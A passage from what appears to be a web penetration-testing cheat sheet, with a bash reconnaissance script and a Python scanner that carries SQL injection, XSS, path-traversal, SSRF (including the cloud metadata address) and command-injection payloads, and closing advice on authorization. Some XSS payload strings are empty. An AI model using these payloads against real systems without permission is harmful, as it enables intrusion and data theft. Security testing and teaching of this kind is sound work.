lookup...\"\nwhois \"$TARGET\" &gt; whois.txt 2&gt;&amp;1\n\n# 2. DNS enumeration\necho \"[*] DNS enumeration...\"\ndig \"$TARGET\" ANY +noall +answer &gt; dns_any.txt\ndig \"$TARGET\" MX +short &gt; dns_mx.txt\ndig \"$TARGET\" NS +short &gt; dns_ns.txt\ndig \"$TARGET\" TXT +short &gt; dns_txt.txt\n\n# Zone transfer attempt\nfor ns in $(cat dns_ns.txt); do\n    echo \"[*] Attempting zone transfer from $ns\"\n    dig AXFR \"$TARGET\" \"@$ns\" &gt;&gt; zonetransfer.txt 2&gt;&amp;1\ndone\n\n# 3. Subdomain enumeration\necho \"[*] Subdomain enumeration...\"\nsublist3r -d \"$TARGET\" -o sublist3r.txt &gt; /dev/null 2&gt;&amp;1\namass enum -passive -d \"$TARGET\" -o amass.txt &gt; /dev/null 2&gt;&amp;1\ncat sublist3r.txt amass.txt 2&gt;/dev/null | sort -u &gt; subdomains.txt\n\n# 4. HTTP probing\necho \"[*] HTTP probing...\"\nif [ -f subdomains.txt ]; then\n    httpx -l subdomains.txt -title -tech-detect -status-code -o httpx.txt\nfi\n\n# 5. Technology detection\necho \"[*] Technology detection...\"\nwhatweb \"https://$TARGET\" --log-json=whatweb.json &gt; /dev/null 2&gt;&amp;1\nwafw00f \"https://$TARGET\" &gt; waf.txt 2&gt;&amp;1\n\n# 6. HTTP headers\necho \"[*] HTTP headers...\"\ncurl -sI \"https://$TARGET\" &gt; headers.txt\n\n# 7. robots.txt &amp; sitemap\necho \"[*] robots.txt and sitemap...\"\ncurl -s \"https://$TARGET/robots.txt\" &gt; robots.txt\ncurl -s \"https://$TARGET/sitemap.xml\" &gt; sitemap.xml\n\n# 8. Wayback URLs\necho \"[*] Wayback Machine URLs...\"\nwaybackurls \"$TARGET\" &gt; wayback.txt\ngrep \"=\" wayback.txt &gt; wayback_params.txt\n\n# 9. Port scanning (quick)\necho \"[*] Quick port scan...\"\nnmap -T4 -F --open -oN nmap_quick.txt \"$TARGET\"\n\n# 10. Generate report\necho \"[*] Generating report...\"\ncat &gt; report.md &lt;&lt; EOF\n# Reconnaissance Report: $TARGET\n\n## Date\n$(date)\n\n## WHOIS Summary\n\\`\\`\\`\n$(head -20 whois.txt)\n\\`\\`\\`\n\n## DNS Records\n### Name Servers\n$(cat dns_ns.txt)\n\n### Mail Servers\n$(cat dns_mx.txt)\n\n### TXT Records\n$(cat dns_txt.txt)\n\n## Subdomains Found\n$(wc -l subdomains.txt 2&gt;/dev/null || echo \"0\") subdomains found\n\\`\\`\\`\n$(head -20 subdomains.txt 2&gt;/dev/null)\n\\`\\`\\`\n\n## Technologies Detected\n\\`\\`\\`\n$(cat whatweb.json 2&gt;/dev/null | jq -r '.[] | \"\\(.plugin): \\(.version // \"unknown\")\"' 2&gt;/dev/null)\n\\`\\`\\`\n\n## Security Headers\n\\`\\`\\`\n$(cat headers.txt)\n\\`\\`\\`\n\n## Open Ports\n\\`\\`\\`\n$(grep \"open\" nmap_quick.txt 2&gt;/dev/null | head -20)\n\\`\\`\\`\n\n## Interesting URLs from Wayback\n\\`\\`\\`\n$(head -20 wayback_params.txt 2&gt;/dev/null)\n\\`\\`\\`\nEOF\n\necho \"[+] Recon complete! Results in $OUTDIR\"\necho \"[+] Report: $OUTDIR/report.md\"\n```\n\n### Web Vulnerability Scanner\n\n```python\n#!/usr/bin/env python3\n# web_scanner.py - Multi-vulnerability web scanner\n# Usage: python3 web_scanner.py -u https://target.com\n\nimport argparse\nimport requests\nimport urllib.parse\nimport re\nimport sys\nfrom concurrent.futures import ThreadPoolExecutor\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nclass WebScanner:\n    def __init__(self, base_url, threads=10, timeout=10):\n        self.base_url = base_url.rstrip('/')\n        self.threads = threads\n        self.timeout = timeout\n        self.session = requests.Session()\n        self.session.headers.update({\n            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) WebScanner/1.0'\n        })\n        self.session.verify = False\n        self.findings = []\n        \n        # Payloads\n        self.sqli_payloads = [\n            \"' OR '1'='1\",\n            \"' OR 1=1--\",\n            \"1' AND '1'='1\",\n            \"1' AND '1'='2\",\n            \"1' UNION SELECT NULL--\",\n            \"1' UNION SELECT NULL,NULL--\",\n            \"1' AND SLEEP(5)--\",\n            \"1' WAITFOR DELAY '00:00:05'--\"\n        ]\n        \n        self.xss_payloads = [\n            \"alert('XSS')\",\n            \"\",\n            \"\",\n            \"javascript:alert(1)\",\n            \"\\\"&gt;alert(1)\"\n        ]\n        \n        self.lfi_payloads = [\n            \"../../../etc/passwd\",\n            \"../../../../etc/passwd\",\n            \"..\\\\..\\\\..\\\\windows\\\\win.ini\",\n            \"../../../etc/passwd%00\",\n            \"../../../etc/passwd%00.png\"\n        ]\n        \n        self.ssrf_payloads = [\n            \"http://127.0.0.1/\",\n            \"http://localhost/\",\n            \"http://169.254.169.254/latest/meta-data/\",\n            \"http://[::1]/\",\n            \"file:///etc/passwd\"\n        ]\n        \n        self.cmdi_payloads = [\n            \"; id\",\n            \"| id\",\n            \"&amp;&amp; id\",\n            \"`id`\",\n            \"$(id)\",\n            \"; sleep 5\"\n        ]\n    \n    def discover_params(self):\n        \"\"\"Discover parameters from URL\"\"\"\n        parsed = urllib.parse.urlparse(self.base_url)\n        params = urllib.parse.parse_qs(parsed.query)\n        discovered = list(params.keys())\n        \n        # Common parameter names to test\n        common_params = ['id', 'page', 'file', 'url', 'path', 'q', 'search', \n                        'query', 'name', 'user', 'username', 'email', 'pass', \n                        'password', 'redirect', 'return', 'next', 'view', \n                        'action', 'cat', 'category']\n        \n        # Add common params if none discovered\n        if not discovered:\n            discovered = common_params\n        \n        return discovered\n    \n    def test_sqli(self, url, param):\n        \"\"\"Test SQL injection\"\"\"\n        for payload in self.sqli_payloads:\n            try:\n                test_url = f\"{url}?{param}={urllib.parse.quote(payload)}\"\n                start = time.time()\n                resp = self.session.get(test_url, timeout=self.timeout)\n                elapsed = time.time() - start\n                \n                # Check for time-based\n                if elapsed &gt; 4 and 'sleep' in payload.lower():\n                    self.add_finding('SQLi', param, payload, 'Time-based blind')\n                    return\n                \n                # Check for error-based\n                if any(err in resp.text.lower() for err in \n                       ['sql', 'mysql', 'syntax error', 'ora-', 'microsoft ole db']):\n                    self.add_finding('SQLi', param, payload, 'Error-based')\n                    return\n                \n                # Check for boolean-based\n                true_payload = f\"1' AND '1'='1\"\n                false_payload = f\"1' AND '1'='2\"\n                \n                true_resp = self.session.get(f\"{url}?{param}={true_payload}\")\n                false_resp = self.session.get(f\"{url}?{param}={false_payload}\")\n                \n                if len(true_resp.text) != len(false_resp.text):\n                    self.add_finding('SQLi', param, 'Boolean-based', \n                                    'Different response lengths')\n                    return\n                    \n            except Exception as e:\n                continue\n    \n    def test_xss(self, url, param):\n        \"\"\"Test Cross-Site Scripting\"\"\"\n        for payload in self.xss_payloads:\n            try:\n                test_url = f\"{url}?{param}={urllib.parse.quote(payload)}\"\n                resp = self.session.get(test_url, timeout=self.timeout)\n                \n                # Check if payload is reflected\n                if payload in resp.text or urllib.parse.quote(payload) in resp.text:\n                    self.add_finding('XSS', param, payload, 'Reflected')\n                    return\n                    \n            except Exception as e:\n                continue\n    \n    def test_lfi(self, url, param):\n        \"\"\"Test Local File Inclusion\"\"\"\n        for payload in self.lfi_payloads:\n            try:\n                test_url = f\"{url}?{param}={urllib.parse.quote(payload)}\"\n                resp = self.session.get(test_url, timeout=self.timeout)\n                \n                # Check for file contents\n                if re.search(r'root:.*:0:0:|\\[extensions\\]|for 16-bit app', resp.text):\n                    self.add_finding('LFI', param, payload, 'File read')\n                    return\n                    \n            except Exception as e:\n                continue\n    \n    def test_ssrf(self, url, param):\n        \"\"\"Test Server-Side Request Forgery\"\"\"\n        for payload in self.ssrf_payloads:\n            try:\n                test_url = f\"{url}?{param}={urllib.parse.quote(payload)}\"\n                resp = self.session.get(test_url, timeout=self.timeout)\n                \n                # Check for internal/cloud metadata\n                if re.search(r'ami-id|instance-id|localhost|root:', resp.text, re.I):\n                    self.add_finding('SSRF', param, payload, 'Internal access')\n                    return\n                    \n            except Exception as e:\n                continue\n    \n    def test_cmdi(self, url, param):\n        \"\"\"Test Command Injection\"\"\"\n        for payload in self.cmdi_payloads:\n            try:\n                test_url = f\"{url}?{param}={urllib.parse.quote(payload)}\"\n                start = time.time()\n                resp = self.session.get(test_url, timeout=self.timeout)\n                elapsed = time.time() - start\n                \n                # Check for time-based\n                if elapsed &gt; 4 and 'sleep' in payload:\n                    self.add_finding('Command Injection', param, payload, 'Time-based')\n                    return\n                \n                # Check for command output\n                if re.search(r'uid=\\d+|gid=\\d+|root:', resp.text):\n                    self.add_finding('Command Injection', param, payload, 'Command output')\n                    return\n                    \n            except Exception as e:\n                continue\n    \n    def check_headers(self):\n        \"\"\"Check security headers\"\"\"\n        try:\n            resp = self.session.get(self.base_url, timeout=self.timeout)\n            headers = {k.lower(): v for k, v in resp.headers.items()}\n            \n            security_headers = {\n                'strict-transport-security': 'HSTS',\n                'content-security-policy': 'CSP',\n                'x-frame-options': 'X-Frame-Options',\n                'x-content-type-options': 'X-Content-Type-Options',\n                'x-xss-protection': 'X-XSS-Protection',\n                'referrer-policy': 'Referrer-Policy'\n            }\n            \n            missing = []\n            for header, name in security_headers.items():\n                if header not in headers:\n                    missing.append(name)\n            \n            if missing:\n                self.findings.append({\n                    'type': 'Missing Security Headers',\n                    'details': f\"Missing: {', '.join(missing)}\"\n                })\n                \n        except Exception as e:\n            print(f\"[-] Header check failed: {e}\")\n    \n    def add_finding(self, vuln_type, param, payload, details):\n        \"\"\"Add finding to results\"\"\"\n        finding = {\n            'type': vuln_type,\n            'parameter': param,\n            'payload': payload,\n            'details': details,\n            'url': self.base_url\n        }\n        self.findings.append(finding)\n        print(f\"[!] Found: {vuln_type} on parameter '{param}' - {details}\")\n    \n    def scan(self):\n        \"\"\"Main scan function\"\"\"\n        print(f\"[*] Starting scan on {self.base_url}\")\n        \n        # Discover parameters\n        params = self.discover_params()\n        print(f\"[*] Testing parameters: {', '.join(params)}\")\n        \n        # Check headers\n        self.check_headers()\n        \n        # Test each parameter\n        for param in params:\n            print(f\"[*] Testing parameter: {param}\")\n            \n            # Run all tests\n            self.test_sqli(self.base_url, param)\n            self.test_xss(self.base_url, param)\n            self.test_lfi(self.base_url, param)\n            self.test_ssrf(self.base_url, param)\n            self.test_cmdi(self.base_url, param)\n        \n        # Print summary\n        print(\"\\n\" + \"=\"*50)\n        print(\"SCAN SUMMARY\")\n        print(\"=\"*50)\n        print(f\"Total findings: {len(self.findings)}\")\n        \n        for i, finding in enumerate(self.findings, 1):\n            print(f\"\\n{i}. {finding['type']}\")\n            print(f\"   Parameter: {finding.get('parameter', 'N/A')}\")\n            print(f\"   Details: {finding['details']}\")\n\ndef main():\n    parser = argparse.ArgumentParser(description='Web Vulnerability Scanner')\n    parser.add_argument('-u', '--url', required=True, help='Target URL')\n    parser.add_argument('-t', '--threads', type=int, default=10, help='Threads')\n    parser.add_argument('--timeout', type=int, default=10, help='Timeout')\n    \n    args = parser.parse_args()\n    \n    scanner = WebScanner(args.url, args.threads, args.timeout)\n    scanner.scan()\n\nif __name__ == '__main__':\n    import time\n    main()\n```\n\n---\n\n## Conclusion\n\nThis comprehensive web penetration testing cheat sheet covers the essential tools, techniques, and methodologies for ethical hacking and security testing. Remember:\n\n### Key Principles\n1. **Always obtain proper authorization** before testing\n2. **Stay within scope** defined in the rules of engagement\n3. **Document everything** for evidence and reporting\n4. **Follow responsible disclosure** when finding vulnerabilities\n5. **Continuous learning** - the security landscape constantly evolves\n\n### Next Steps\n1. Set up a practice lab (DVWA, WebGoat, HackTheBox)\n2. Master the core tools (Burp Suite, Nmap, SQLmap)\n3. Learn programming (Python, Bash, JavaScript)\n4. Get certified (OSCP, PNPT, etc.)\n5. Participate in bug bounty programs\n6. Stay updated with security news and CVEs\n\n### Stay Legal, Stay Ethical\nRemember that with great power comes great responsibility. Use these skills to make the internet safer, not to cause harm. Always test with permission and report vulnerabilities responsibly.\n\n---\n\n*\u00a9 2025 awjunaid.com - For authorized security testing only*", "creation_timestamp": "2026-07-02T07:27:36.996923Z"}